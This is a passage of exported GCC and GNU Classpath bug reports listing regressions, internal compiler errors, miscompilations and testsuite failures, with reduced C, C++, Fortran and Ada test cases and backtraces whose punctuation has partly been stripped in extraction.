with preprocessed source if appropriate.</t>
  </si>
  <si>
    <t>GCC-14835</t>
  </si>
  <si>
    <t>GCC-33267</t>
  </si>
  <si>
    <t>[4.3 Regression] libgomp testsuite timeouts</t>
  </si>
  <si>
    <t>trunk 20070829 configured with --enable-targets=all and tested with 
RUNTESTFLAGS=--target_board=unix\{-m64\}:
  Matthias
Running target unix/-m64
WARNING: program timed out.
FAIL: libgomp.c/loop-1.c execution test
WARNING: program timed out.
FAIL: libgomp.c/loop-2.c execution test
WARNING: program timed out.
FAIL: libgomp.c/nestedfn-5.c execution test
WARNING: program timed out.
FAIL: libgomp.c/ordered-1.c execution test
WARNING: program timed out.
FAIL: libgomp.c/ordered-2.c execution test
WARNING: program timed out.
FAIL: libgomp.c/pr29947-1.c execution test
WARNING: program timed out.
FAIL: libgomp.c/pr29947-2.c execution test
WARNING: program timed out.
FAIL: libgomp.c/sections-1.c execution test
WARNING: program timed out.
FAIL: libgomp.c++/pr26943.C  -O0  execution test
WARNING: program timed out.
FAIL: libgomp.c++/pr26943.C  -O1  execution test
WARNING: program timed out.
FAIL: libgomp.c++/pr26943.C  -O2  execution test
WARNING: program timed out.
FAIL: libgomp.c++/pr26943.C  -O3 -fomit-frame-pointer  execution test
WARNING: program timed out.
FAIL: libgomp.c++/pr26943.C  -O3 -fomit-frame-pointer -funroll-loops  execution test
WARNING: program timed out.
FAIL: libgomp.c++/pr26943.C  -O3 -fomit-frame-pointer -funroll-all-loops -finline-functions  execution test
WARNING: program timed out.
FAIL: libgomp.c++/pr26943.C  -O3 -g  execution test
WARNING: program timed out.
FAIL: libgomp.c++/pr26943.C  -Os  execution test
WARNING: program timed out.
FAIL: libgomp.fortran/do1.f90  -O0  execution test
WARNING: program timed out.
FAIL: libgomp.fortran/do1.f90  -O1  execution test
WARNING: program timed out.
FAIL: libgomp.fortran/do1.f90  -O2  execution test
WARNING: program timed out.
FAIL: libgomp.fortran/do1.f90  -O3 -fomit-frame-pointer  execution test
WARNING: program timed out.
FAIL: libgomp.fortran/do1.f90  -O3 -fomit-frame-pointer -funroll-loops  execution test
WARNING: program timed out.
FAIL: libgomp.fortran/do1.f90  -O3 -fomit-frame-pointer -funroll-all-loops -finline-functions  execution test
WARNING: program timed out.
FAIL: libgomp.fortran/do1.f90  -O3 -g  execution test
WARNING: program timed out.
FAIL: libgomp.fortran/do1.f90  -Os  execution test
WARNING: program timed out.
FAIL: libgomp.fortran/do2.f90  -O0  execution test
WARNING: program timed out.
FAIL: libgomp.fortran/do2.f90  -O1  execution test
WARNING: program timed out.
FAIL: libgomp.fortran/do2.f90  -O2  execution test
WARNING: program timed out.
FAIL: libgomp.fortran/do2.f90  -O3 -fomit-frame-pointer  execution test
WARNING: program timed out.
FAIL: libgomp.fortran/do2.f90  -O3 -fomit-frame-pointer -funroll-loops  execution test
WARNING: program timed out.
FAIL: libgomp.fortran/do2.f90  -O3 -fomit-frame-pointer -funroll-all-loops -finline-functions  execution test
WARNING: program timed out.
FAIL: libgomp.fortran/do2.f90  -O3 -g  execution test
WARNING: program timed out.
FAIL: libgomp.fortran/do2.f90  -Os  execution test
WARNING: program timed out.
FAIL: libgomp.fortran/omp_parse1.f90  -O0  execution test
WARNING: program timed out.
FAIL: libgomp.fortran/omp_parse1.f90  -O1  execution test
WARNING: program timed out.
FAIL: libgomp.fortran/omp_parse1.f90  -O2  execution test
WARNING: program timed out.
FAIL: libgomp.fortran/omp_parse1.f90  -O3 -fomit-frame-pointer  execution test
WARNING: program timed out.
FAIL: libgomp.fortran/omp_parse1.f90  -O3 -fomit-frame-pointer -funroll-loops  execution test
WARNING: program timed out.
FAIL: libgomp.fortran/omp_parse1.f90  -O3 -fomit-frame-pointer -funroll-all-loops -finline-functions  execution test
WARNING: program timed out.
FAIL: libgomp.fortran/omp_parse1.f90  -O3 -g  execution test
WARNING: program timed out.
FAIL: libgomp.fortran/omp_parse1.f90  -Os  execution test
                === libgomp Summary for unix/-m64 ===
# of expected passes            1567
# of unexpected failures        40</t>
  </si>
  <si>
    <t>GCC-37679</t>
  </si>
  <si>
    <t>-fstrict-aliasing causes omission of double-to-float conversion</t>
  </si>
  <si>
    <t>The program which will be attached
demonstrates a case where
when the -fstrict-aliasing optimization is turned on
the result of the final one of 6 double-to-float conversions
does not get written to memory as it should.
According to valgrind (memory debugging tool) the target memory
gets left uninitialized.
The expected output and actual output are described in the program's comments.
I don't think I have done any illegal pointer aliasing in this program
and the -Wstrict-aliasing=2 option doesn't warn of any such errors.
The problem occurs in g++ 4.1.2.
It does not occur in older versions I tried (4.0.2 3.3.5)
nor at lower optimization levels.
The compiler version info as shown by g++ -v is:
    Using built-in specs.
    Target: x86_64-suse-linux
    Configured with: ../configure --prefix=/usr --mandir=/usr/share/man --infodir=/usr/share/info --libdir=/usr/lib64 --libexecdir=/usr/lib64 --with-gxx-include-dir=/usr/include/c++/4.1.2 --enable-languages=cc++fortran --enable-shared --enable-threads=posix --disable-checking --with-system-zlib --enable-__cxa_atexit --without-system-libunwind --enable-spp --disable-libssp --enable-version-specific-runtime-libs --host=x86_64-suse-linux
    Thread model: posix
    gcc version 4.1.2</t>
  </si>
  <si>
    <t>dhatch</t>
  </si>
  <si>
    <t>GCC-45721</t>
  </si>
  <si>
    <t>[4.6 Regression] ICE: in function_and_variable_visibility at ipa.c:673 with -flto</t>
  </si>
  <si>
    <t>Compiler output:
$ gcc -flto -r -nostdlib file[12].c
lto1: internal compiler error: in function_and_variable_visibility at ipa.c:673
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
lto-wrapper: /mnt/svn/gcc-trunk/binary-164287-lto-fortran-checking-yes-rtl-df/bin/gcc returned 1 exit status
collect2: lto-wrapper returned 1 exit status
------ file1.c ------
extern void baz(void)
void *y = (void *)baz
---------------------
------ file2.c ------
static void bar(void) __attribute__ ((__weakref__(baz)))
void *x = (void *)bar
---------------------
I don't know if this is valid but originally those were valid C and C++ files including only system libraries.
Tested revisions:
r164287 - crash
r163636 - crash
r161659 - OK
r159696 - OK
r153685 - OK
4.5 r163761 - OK</t>
  </si>
  <si>
    <t>GCC-18883</t>
  </si>
  <si>
    <t>ICE in gfc_finish_var_decl</t>
  </si>
  <si>
    <t>Test case from a post on comp.lang.fortran.
$ cat dud.f90
!From: James Van Buskirk 
!Newsgroups: comp.lang.fortran
!Subject: Re: sizeof equivalent in fortran 90 programs
!Message-ID: 
!Organization: Comcast Online
!Date: Wed 08 Dec 2004 08:00:01 GMT
!
!Rich Townsend  wrote in message
!news:cp5v6s$8l6$1@scrotar.nss.udel.edu...
!
!&gt;                                 Apologies for overlooking your post.
!
!No problem.  It just gave me an opportunity to get on my hobby
!horse about initialization expressions.  Regarding my hobby
!horse about specification expressions try using CVF to compile:
!
module helper
   implicit none
   contains
      function dud(x)
         integer intent(in) :: x
         character(selected_int_kind(x)+2) dud
         dud = repeat('x'len(dud))
      end function dud
end module helper
program sik
   use helper
   implicit none
   integer i
   integer parameter :: s(-5:5) = (/(selected_int_kind(i)i=-55)/)
   do i = -5 5
      write(*'(4i4)') iselected_int_kind(i)s(i)len(dud(i))-2
   end do
end program sik
!and compare with lf95 or g95.
!
!--
!write(**) transfer((/17.392111325966148d06.5794487871554595D-85 &amp;
!6.0134700243160014d-154/)(/'x'/)) end
$ gfortran dud.f90
dud.f90: In function 'dud':
dud.f90:20: internal compiler error: in gfc_finish_var_decl at
fortran/trans-decl.c:416
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
$ gfortran -v
Reading specs from /home/ig25/lib/gcc/i686-pc-linux-gnu/4.0.0/specs
Configured with: ../gcc/configure --prefix=/home/ig25
--enable-languages=cc++f95 --disable-shared : (reconfigured) ../gcc/configure
--prefix=/home/ig25 --disable-shared
--with-gcc-version-trigger=/home/ig25/gcc/gcc/version.c
--enable-languages=cc++f95 --no-create --no-recursion
Thread model: posix
gcc version 4.0.0 20041206 (experimental)
$</t>
  </si>
  <si>
    <t>GCC-45955</t>
  </si>
  <si>
    <t>FAIL: gcc.dg/initpri1.c (test for excess errors)</t>
  </si>
  <si>
    <t>Executing on host: /test/gnu/gcc/objdir/gcc/xgcc -B/test/gnu/gcc/objdir/gcc/ /te
st/gnu/gcc/gcc/gcc/testsuite/gcc.dg/initpri1.c    -ansi -pedantic-errors  -lm   
-o ./initpri1.exe    (timeout = 300)
WARNING: program timed out.
compiler exited with status 1
FAIL: gcc.dg/initpri1.c (test for excess errors)
Running under gdb I see:
Program received signal SIGINT Interrupt.
0x01478e68 in build_cdtor (ctor_p=1 '\001' cdtors=0x400c9108)
    at ../../gcc/gcc/ipa.c:1490
1490	      while (i &lt; len)
(gdb) bt
#0  0x01478e68 in build_cdtor (ctor_p=1 '\001' cdtors=0x400c9108)
    at ../../gcc/gcc/ipa.c:1490
#1  0x01479384 in build_cdtor_fns () at ../../gcc/gcc/ipa.c:1565
#2  0x0147962c in ipa_cdtor_merge () at ../../gcc/gcc/ipa.c:1594
#3  0x00ca6da0 in execute_one_pass (pass=0x4001ca4c)
    at ../../gcc/gcc/passes.c:1562
#4  0x00ca8058 in execute_ipa_pass_list (pass=0x4001ca4c)
    at ../../gcc/gcc/passes.c:1929
#5  0x013ee044 in ipa_passes () at ../../gcc/gcc/cgraphunit.c:1734
#6  0x013ee1a8 in cgraph_optimize () at ../../gcc/gcc/cgraphunit.c:1769
#7  0x013eb62c in cgraph_finalize_compilation_unit ()
    at ../../gcc/gcc/cgraphunit.c:1020
#8  0x000c262c in c_write_global_declarations ()
    at ../../gcc/gcc/c-decl.c:9821
#9  0x00e2c434 in compile_file () at ../../gcc/gcc/toplev.c:946
#10 0x00e30508 in do_compile () at ../../gcc/gcc/toplev.c:2374
#11 0x00e30694 in toplev_main (argc=19 argv=0x7eff05e4)
    at ../../gcc/gcc/toplev.c:2415
#12 0x00373f34 in main (argc=19 argv=0x7eff05e4) at ../../gcc/gcc/main.c:36
There's a thinko in this code:
      /* Find the next batch of constructors/destructors with the same
         initialization priority.  */
      for (i &lt; j i++)
        {
          tree call
          fn = VEC_index (tree cdtors i)
          call = build_call_expr (fn 0)
          if (ctor_p)
            DECL_STATIC_CONSTRUCTOR (fn) = 0
          else
            DECL_STATIC_DESTRUCTOR (fn) = 0
          /* We do not want to optimize away pure/const calls here.
             When optimizing these should be already removed when not
             optimizing we want user to be able to breakpoint in them.  */
          TREE_SIDE_EFFECTS (call) = 1
          append_to_statement_list (call 
        }
      while (i &lt; len)</t>
  </si>
  <si>
    <t>GCC-34180</t>
  </si>
  <si>
    <t>Default copy constructor copies const auto_ptr members</t>
  </si>
  <si>
    <t>It is an error to assign or copy a const auto_ptr. g++ should refuse to compile the following code:
bug.cpp:
#include 
int main()
{
        class A
        {
                const std::auto_ptr a
        }
        A a
}
Compiled with:
g++ bug.cpp
This code compiles incorrectly on the following version of gcc:
Using built-in specs.
Target: i386-redhat-linux
Configured with: ../configure --prefix=/usr --mandir=/usr/share/man --infodir=/usr/share/info --enable-shared --enable-threads=posix --enable-checking=release --with-system-zlib --enable-__cxa_atexit --disable-libunwind-exceptions --enable-languages=cc++objcobj-c++javafortranada --enable-java-awt=gtk --disable-dssi --enable-plugin --with-java-home=/usr/lib/jvm/java-1.5.0-gcj-1.5.0.0/jre --enable-libgcj-multifile --enable-java-maintainer-mode --with-ecj-jar=/usr/share/java/eclipse-ecj.jar --with-cpu=generic --host=i386-redhat-linux
Thread model: posix
gcc version 4.1.2 20070502 (Red Hat 4.1.2-12)</t>
  </si>
  <si>
    <t>jeidsath</t>
  </si>
  <si>
    <t>GCC-57023</t>
  </si>
  <si>
    <t>[4.8 Regression] Not packing arrays with changing variable used for size</t>
  </si>
  <si>
    <t>Doing what the program below does is _extremely_ bad style -
changing n which is used for specifying the array size.
However I think it is legal and the expected output
is
1 1 1 1 0
1 1 1 1 0
1 1 1 1 0
1 1 1 1 0
0 0 0 0 0
Actual output is
 1 1 1 1 1
 1 1 1 1 1
 1 1 1 1 1
 1 0 0 0 0
 0 0 0 0 0
module mymod
contains
  subroutine foo(an)
    integer dimension(nn) intent(inout) :: a
    integer :: n
    n = n - 1
    call baz(a(1:n1:n)n)
  end subroutine foo
  subroutine baz(an)
    integer dimension(nn) intent(inout) :: a
    a = 1
  end subroutine baz
end module mymod
program main
  use mymod
  integer dimension(55) :: a
  n = 5
  a = 0
  call foo(an)
  print '(5I2)'a
end program main
The problem is in gfc_full_array_ref_p which uses gfc_dep_compare_expr
to compare the upper bounds (n against n) without noting that n
has been changed in the meantime.
Proposed solution:
a) Always warn about such horrible code
b) If something like that happens don't assume a full reference
   and don't set the contiguous argument to gfc_full_array_ref_p to
   true.
The code was introduced in rev. 156749 btw quite some time ago.</t>
  </si>
  <si>
    <t>GCC-10759</t>
  </si>
  <si>
    <t>Invalid use of typename accepted</t>
  </si>
  <si>
    <t>I think the use of typename in the last line is
bogus yet it is accepted by all versions of gcc:
-------------------------------------
namespace NS {
  template  class C
}
template  struct X {
    NS::C foo ()
}
template 
typename NS::C X::foo () {}
----------------------------------
Note that this stops to be accepted once I move C out of
namespace NS but that shouldn't really matter. Irritatingly
icc has the same bug so I found this just by accident...
W.
Release:
unknown
Environment:
all versions up to today's CVS</t>
  </si>
  <si>
    <t>CLASSPATH-26584</t>
  </si>
  <si>
    <t>Installation of 0.90 installs java source files</t>
  </si>
  <si>
    <t>The installation process of 0.90 installs java source files for the tools. These should not be installed.</t>
  </si>
  <si>
    <t>GCC-61554</t>
  </si>
  <si>
    <t>[4.10 Regression] ICE: Segmentation fault</t>
  </si>
  <si>
    <t>Created attachment 32969
gzipped C++ source code
The attached source code when compiled by trunk dated today 20140618
does this when compiled with -O2
 ../results/bin/gcc -c -O2 bug149.cc
/home/dcb/rpmbuild/BUILD/stdair-1.00.1/stdair/bom/SegmentSnapshotTable.cpp: In member function â€˜boost::multi_array long unsigned int NumDims = 2ul Allocator = std::allocator]â€™:
/home/dcb/rpmbuild/BUILD/stdair-1.00.1/stdair/bom/SegmentSnapshotTable.cpp:469:1: internal compiler error: Segmentation fault
 }
 ^
0xa9697f crash_signal
	../../src/trunk/gcc/toplev.c:337
0x890bbc bb_seq_addr
	../../src/trunk/gcc/gimple.h:1389
0x890bbc gsi_start_bb
	../../src/trunk/gcc/gimple-iterator.h:118
0x890bbc gsi_for_stmt(gimple_statement_base*)
	../../src/trunk/gcc/gimple-iterator.c:620
0xbc031c substitute_and_fold(tree_node* (*)(tree_node*) bool (*)(gimple_stmt_iterator*) bool)
	../../src/trunk/gcc/tree-ssa-propagate.c:1225
0xb45aea ccp_finalize
	../../src/trunk/gcc/tree-ssa-ccp.c:926
0xb45aea do_ssa_ccp
	../../src/trunk/gcc/tree-ssa-ccp.c:2341
0xb45aea execute
	../../src/trunk/gcc/tree-ssa-ccp.c:2374
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.</t>
  </si>
  <si>
    <t>GCC-67160</t>
  </si>
  <si>
    <t>static_assert feature test macro</t>
  </si>
  <si>
    <t>Created attachment 36150
Patch
GCC trunk supports static_assert as defined in N3928 (http://wg21.link/n3928) but defines the feature test macro __cpp_static_assert to the C++11 value 200410. The appropriate value for N3928 static_assert is 201411 per N4440 (http://wg21.link/n4440#recs.cpp17). Attached patch updates the predefined value to 201411.</t>
  </si>
  <si>
    <t>GCC-45746</t>
  </si>
  <si>
    <t>[OOP] ICE in fold_convert_loc: pointer to allocatable array with select type</t>
  </si>
  <si>
    <t>MODULE BUG_MODULE
  TYPE::A_TYPE
  END TYPE A_TYPE
  TYPEEXTENDS(A_TYPE)::B_TYPE
     TYPE(A_TYPE)DIMENSION(:)ALLOCATABLE::A_LIST
  END TYPE B_TYPE
  TYPE::C_TYPE
     TYPE(B_TYPE)DIMENSION(:)ALLOCATABLE::B_LIST
   CONTAINS
     PROCEDURE::DO_SOMETHING
  END TYPE C_TYPE
CONTAINS
  SUBROUTINE DO_SOMETHING(DTV)
    CLASS(C_TYPE) :: DTV
    CLASS(A_TYPE)POINTER::A_POINTER
    SELECT TYPE(A_POINTER)
    TYPE IS (B_TYPE)
       DTV%B_LIST(1)=A_POINTER
    END SELECT
  END SUBROUTINE DO_SOMETHING
END MODULE BUG_MODULE
GNU Fortran (GCC) 4.6.0 20100921 (experimental)
gfortran -c BUG_MODULE.f03
BUG_MODULE.f03: In Funktion Â»do_somethingÂ«:
BUG_MODULE.f03:23:0: interner Compiler-Fehler: in fold_convert_loc bei fold-const.c:2021</t>
  </si>
  <si>
    <t>boschmann</t>
  </si>
  <si>
    <t>GCC-61020</t>
  </si>
  <si>
    <t>[4.9/4.10 Regression] typeid(typeid(X)) produces 'ud2'</t>
  </si>
  <si>
    <t>The test case:
#include 
struct Base {
  virtual ~Base() { }
}
struct Derived : public Base {
}
int compare(const Base&amp; base)
{
  return typeid(base) == typeid(typeid(Derived))
}
int main()
{
  Base base
  Derived derived
  if (compare(base)) return 1
  if (compare(derived)) return 2
  return 0
}
Using trunk @ r209848
g++ -g t.cc &amp;&amp; ./a.out &amp;&amp; echo OK
OK
g++ -g t.cc -O2 &amp;&amp; ./a.out 
Segmentation fault (core dumped)
(gdb) disas main
Dump of assembler code for function main():
   0x00000000004004c0 :     mov    0x8%rax
   0x00000000004004c8 :     ud2    
End of assembler dump.
It appears that GCC believes the test to invoke undefined behavior.
However I don't see anything in the standard to support this.
P.S. Same result in C++98 and C++11
P.P.S. In the original code the double application of typeid() was a bug.</t>
  </si>
  <si>
    <t>GCC-38165</t>
  </si>
  <si>
    <t>g++.dg/pubtypes.C fails at -m32/-m64 on i686-apple-darwin9</t>
  </si>
  <si>
    <t>The g++.dg/pubtypes.C test case fails at both -m32 and -m64 on i686-apple-darwin9. The appears as...
Executing on host: /sw/src/fink.build/gcc44-4.3.999-20081116/darwin_objdir/gcc/testsuite/g++/../../g++ -B/sw/src/fink.build/gcc44-4.3.999-20081116/darwin_objdir/gcc/testsuite/g++/../../ /sw/src/fink.build/gcc44-4.3.999-20081116/gcc-4.4-20081116/gcc/testsuite/g++.dg/pubtypes.C  -nostdinc++ -I/sw/src/fink.build/gcc44-4.3.999-20081116/darwin_objdir/i686-apple-darwin10/libstdc++-v3/include/i686-apple-darwin10 -I/sw/src/fink.build/gcc44-4.3.999-20081116/darwin_objdir/i686-apple-darwin10/libstdc++-v3/include -I/sw/src/fink.build/gcc44-4.3.999-20081116/gcc-4.4-20081116/libstdc++-v3/libsupc++ -I/sw/src/fink.build/gcc44-4.3.999-20081116/gcc-4.4-20081116/libstdc++-v3/include/backward -I/sw/src/fink.build/gcc44-4.3.999-20081116/gcc-4.4-20081116/libstdc++-v3/testsuite/util -fmessage-length=0  -O0 -gdwarf-2 -dA -fno-eliminate-unused-debug-types  -S  -m32 -o pubtypes.s    (timeout = 300)
PASS: g++.dg/pubtypes.C (test for excess errors)
PASS: g++.dg/pubtypes.C scan-assembler __debug_pubtypes
FAIL: g++.dg/pubtypes.C scan-assembler long+[ \t]+0x24+[ \t]+[#]+[ \t]+Length of Public Type Names Info
PASS: g++.dg/pubtypes.C scan-assembler empty\\\\0+[ \t]+[#]+[ \t]+external name
PASS: g++.dg/pubtypes.C scan-assembler A\\\\0+[ \t]+[#]+[ \t]+external name
PASS: g++.dg/pubtypes.C scan-assembler B\\\\0+[ \t]+[#]+[ \t]+external name</t>
  </si>
  <si>
    <t>GCC-45607</t>
  </si>
  <si>
    <t>[4.4 Regression] Confusing error message</t>
  </si>
  <si>
    <t>struct A{
   enum A {yesterday today tomorrow}
}
int main(){}
The code above gives error
prog.cpp:2: error: â€˜class Aâ€™ has the same name as the class in which it is declared
It is at the best confusing. The error message could probably be 'declaration of a memeber of the same name as the class in which it is declared' or something similar</t>
  </si>
  <si>
    <t>anubhav.saxena</t>
  </si>
  <si>
    <t>GCC-10550</t>
  </si>
  <si>
    <t>undefined reference to out_of_range::out_of_range</t>
  </si>
  <si>
    <t>From: Wolfgang Bangerth 
To: Hovik Manvelyan 
Cc: gcc-gnats@gcc.gnu.org
Subject: Re: c++/10550: undefined reference to out_of_range::out_of_range
Date: Tue 29 Apr 2003 17:13:37 -0500 (CDT)
 &gt; We are planning to switch to newer version of gcc but it requires some time.
 &gt; I need to resolve this problem now.
 &gt; I would like to know why this error is happening and is there workaround for it.
 I have no idea. Maybe someone just forgot to write this constructor maybe 
 it's a compiler bug. The 2.95 branch has been abandoned more than 2 years 
 ago I don't think anybody will be willing to invest work in it any more.
 Sorry
   W.
 -------------------------------------------------------------------------
 Wolfgang Bangerth              email:            bangerth@ices.utexas.edu
                                www: http://www.ices.utexas.edu/~bangerth/</t>
  </si>
  <si>
    <t>hovik</t>
  </si>
  <si>
    <t>GCC-46896</t>
  </si>
  <si>
    <t>[4.3/4.4/4.5/4.6 Regression] Wrong code with transpose(a) passed to subroutine</t>
  </si>
  <si>
    <t>This test case is from comment 12 of pr46842 and is a new bug.
integer :: a(22)
a = reshape([1234] [22])
call sub(transpose(a))
contains
 subroutine sub(x)
   integer :: x(::)
   a(1:) = 88
   a(2:) = x(:1)
   if (any (a(:1) /= [88 1]).or.any (a(:2) /= [88 3])) then
     print * a
     call abort()
   end if
   print * a
 end subroutine sub
end
Gives:
$ ./a.out 
          88          88          88          88
Should give:
$ ./a.out 
          88           1          88           3
This is a serious bug and should get some priority.</t>
  </si>
  <si>
    <t>GCC-55106</t>
  </si>
  <si>
    <t>ice: Maximum number of LRA constraint passes is achieved (15)</t>
  </si>
  <si>
    <t>Created attachment 28545
C++ source code
I just tried to compile the package verilator-3.805-5
on gcc-4.8 trunk dated 20121027 on an AMD x86_64 box.
The compiler said
../V3Number.cpp:1286:1: internal compiler error: Maximum number of LRA constraint passes is achieved (15)
 }
 ^
0x994c28 lra_constraints(bool)
    ../../src/trunk/gcc/lra-constraints.c:3262
0x9882fe lra(_IO_FILE*)
    ../../src/trunk/gcc/lra.c:2281
0x9507a6 do_reload
    ../../src/trunk/gcc/ira.c:4614
0x9507a6 rest_of_handle_reload
    ../../src/trunk/gcc/ira.c:4720
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.
Preprocessed source code attached. Flag -O3 required.</t>
  </si>
  <si>
    <t>GCC-16908</t>
  </si>
  <si>
    <t>Segfault in libgfortran/io/transfer.c</t>
  </si>
  <si>
    <t>Consider the following program:
   program synsig
   implicit none 
   integer n nt mt m
   real dt tm w
   real allocatable :: p(:)
   nt =  2049 ! if nt &lt; 2049 then everything works.
   allocate(p(nt))
   p  = 0.e0
   inquire(iolength=mt) (p(m) m=1 nt)
   open(unit=12 file='syn.sax' access='direct' recl=mt)
   n = 1
   write(12 rec=n) mt nt
   write(12 rec=n+1) (p(m) m=1 nt)
   close(12)
   inquire(iolength=mt) (p(m) m=1 nt)
   open(unit=12 file='syn.sax' access='direct' recl=mt)
   n = 1
   write(12 rec=n) mt nt
   write(12 rec=n+1) (p(m) m=1 nt)
   close(12)
   end program synsig
If nt &gt;= 2049 then the second time the program tries to create the
data file 'syn.sax' the program will segfault.
Program terminated with signal 11 Segmentation fault.
#0  0x000000000041a633 in memset ()
(gdb) bt
#0  0x000000000041a633 in memset ()
#1  0x0000000000402553 in _gfortran_next_record (done=1)
    at ../../../gcc/libgfortran/io/transfer.c:1235
#2  0x0000000000403474 in finalize_transfer () at
../../../gcc/libgfortran/io/transfer.c:1365
#3  0x0000000000403619 in _gfortran_st_write_done ()
    at ../../../gcc/libgfortran/io/transfer.c:1482
#4  0x00000000004003ed in MAIN__ () at synsig.f90:18
#5  0x000000000040064e in main (argc=Variable argc is not available.
) at ../../../gcc/libgfortran/fmain.c:18
(gdb) list
18        MAIN__ ()
19
20        /* Bye-bye!  */
21        return 0
22      }</t>
  </si>
  <si>
    <t>sgk</t>
  </si>
  <si>
    <t>GCC-80850</t>
  </si>
  <si>
    <t>Sourced allocate() fails to allocate a pointer</t>
  </si>
  <si>
    <t>Hello
Code repo:
https://gitlab.com/DmitryLyakh/GFC
Build:
Type make.
Problem (bug):
Please run the binary test_gfc.x 5-10 times (it is quick). On my Ubuntu laptop some (not all) of these identical runs crash with a message from allocate():
Attempt to allocate an allocated object
This crash happens in gfc_base.F90 line 343. As you will see the allocate() statement is trying to clone an object via the sourced allocation. The corresponding class(*) pointer new_el is explicitly nullified in line 342. Thus I do not see how I could get the above Attempt to allocate an allocated object error.
If you change the BUILD_TYPE in Makefile (line 9) from DEV to OPT (optimized) the problem disappears. New versions of GCC have the same problem (up to 6.3). The Intel and IBM XL compilers pass all tests without any problems.
Thanks
Dmitry</t>
  </si>
  <si>
    <t>GCC-6769</t>
  </si>
  <si>
    <t>g++ SS 20020521 ostream sets failure 0x1 for no apparent reason</t>
  </si>
  <si>
    <t>A program that reads an input file does a minor transform and writes it
to another file now fails. I backed out the change to ostream.tcc in the
snapshot by replacing it with the file from the 3.1 release and the
problem stopped.
Release:
3.1.1 20020521 (prerelease)
Environment:
System: Linux mwg 2.4.19-pre5ac1Np3 #1 Wed May 15 18:10:20 PDT 2002 pentium3 unknown
Architecture: pentium3
host: pentium3-inX-linux
build: pentium3-inX-linux
target: pentium3-inX-linux</t>
  </si>
  <si>
    <t>tmwg</t>
  </si>
  <si>
    <t>GCC-46111</t>
  </si>
  <si>
    <t>[4.6 Regression] ICE: tree check: expected tree that contains 'decl minimal' structure have 'mem_ref' in take_address_of at tree-parloops.c:336 with -ftree-parallelize-loops -g</t>
  </si>
  <si>
    <t>Created attachment 22103
reduced testcase
Compiler output:
$ gcc -O -ftree-parallelize-loops=2 -g pr46111.C
pr46111.C: In function 'void foo(int)':
pr46111.C:25:1: internal compiler error: tree check: expected tree that contains 'decl minimal' structure have 'mem_ref' in take_address_of at tree-parloops.c:336
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
Tested revisions:
r165740 - crash
r161659 - crash
r159696 - OK
4.5 r163761 - OK</t>
  </si>
  <si>
    <t>GCC-57488</t>
  </si>
  <si>
    <t>[4.9 regression] loop terminates early at -O3</t>
  </si>
  <si>
    <t>The following code is miscompiled with current gcc trunk at -O3 on x86_64-linux in both 32 and 64-bit modes.  The innermost loop in foo should execute 48 times but at -O3 it does not (note the only place 'v' is touched is in that loop).  I've tried reducing the testcase further but any perturabation seems to hide the bug.
$ gcc-trunk -v
gcc version 4.9.0 20130531 (experimental) [trunk revision 199531] (GCC) 
$ gcc-trunk -O2 wrong.c 
$ ./a.out 
0
$ gcc-4.8 -O3 wrong.c 
$ ./a.out 
0
$ gcc-trunk -O3 wrong.c 
$ ./a.out 
24
$
---------------------------------------
int printf(const char * ...)
int i j *pj = 
int x *px = 
short s *ps = 
unsigned short u *pu = 
char c *pc = 
unsigned char v = 48
int
bar (int p)
{
    p = k
    *px = **ppu = i
    *ppj = 
    if (**ppj)
        *pj = p
    return p
}
void
foo ()
{
    for ( i &lt;= 3 i++)
    	for ( j j--)
    u ^= bar (*pj)
    for (k = 1 k &gt;= 0 k--)
    {
        int l
        bar (0)
        for (l = 1 l &lt; 5 l++)
        {
            int m
            for (m = 6 m m--)
            {
            	v--
                *ps = *pc
            }
        }
    }
}
int
main ()
{
    foo ()
    printf (%d\n v)
    return 0
}</t>
  </si>
  <si>
    <t>dhazeghi</t>
  </si>
  <si>
    <t>GCC-66406</t>
  </si>
  <si>
    <t>go.test/test/nilptr.go FAILs with PIE</t>
  </si>
  <si>
    <t>With --enable-default-pie go.test/test/nilptr.go FAILs on both Linux/x86_64 and
Solaris 12/x86 for 32 and 64-bit:
+FAIL: go.test/test/nilptr.go execution  -O2 -g 
panic: dummy too far out
goroutine 16 [running]:
main.main
        /vol/gcc/src/hg/trunk/solaris/gcc/testsuite/go.test/test/nilptr.go:28
created by main
        /vol/gcc/src/hg/trunk/solaris/libgo/runtime/go-main.c:48
  Rainer</t>
  </si>
  <si>
    <t>GCC-20921</t>
  </si>
  <si>
    <t>Unable to access components of task access constraint</t>
  </si>
  <si>
    <t>This
   type Event_Queue_Base (Start_Started : Boolean
                          Priority : System.Priority
                          Storage_Size : Positive)
   is tagged private
   task type Dispatcher (The_Queue : access Event_Queue_Base'Class) is
      pragma Priority (The_Queue.Priority)
      pragma Storage_Size (The_Queue.Storage_Size)
results in
constrained_task.ads:12:24: premature usage of incomplete type Event_Queue_Base'Class defined at 
line 5
Reproducer to follow.</t>
  </si>
  <si>
    <t>GCC-59636</t>
  </si>
  <si>
    <t>[c++1y] ICE with missing template parameter in lambda</t>
  </si>
  <si>
    <t>The following invalid code line (compiled with -std=c++1y) triggers an
ICE on trunk:
===========================================
auto i = []() { return []() {} }
===========================================
bug.cc: In lambda function:
bug.cc:1:26: internal compiler error: Segmentation fault
 auto i = []() { return []() {} }
                          ^
0xb75baf crash_signal
        ../../gcc/gcc/toplev.c:336
0x6916ef cp_parser_template_parameter
        ../../gcc/gcc/cp/parser.c:13055
0x6916ef cp_parser_template_parameter_list
        ../../gcc/gcc/cp/parser.c:12882
0x67d322 cp_parser_lambda_declarator_opt
        ../../gcc/gcc/cp/parser.c:9027
0x67d322 cp_parser_lambda_expression
        ../../gcc/gcc/cp/parser.c:8751
0x67d322 cp_parser_primary_expression
        ../../gcc/gcc/cp/parser.c:4309
0x67e5da cp_parser_postfix_expression
        ../../gcc/gcc/cp/parser.c:5969
0x681698 cp_parser_unary_expression
        ../../gcc/gcc/cp/parser.c:7170
0x68232f cp_parser_binary_expression
        ../../gcc/gcc/cp/parser.c:7874
0x682821 cp_parser_assignment_expression
        ../../gcc/gcc/cp/parser.c:8112
0x6847b4 cp_parser_expression
        ../../gcc/gcc/cp/parser.c:8274
0x67dce1 cp_parser_expression
        ../../gcc/gcc/cp/parser.c:8313
0x67dce1 cp_parser_lambda_body
        ../../gcc/gcc/cp/parser.c:9223
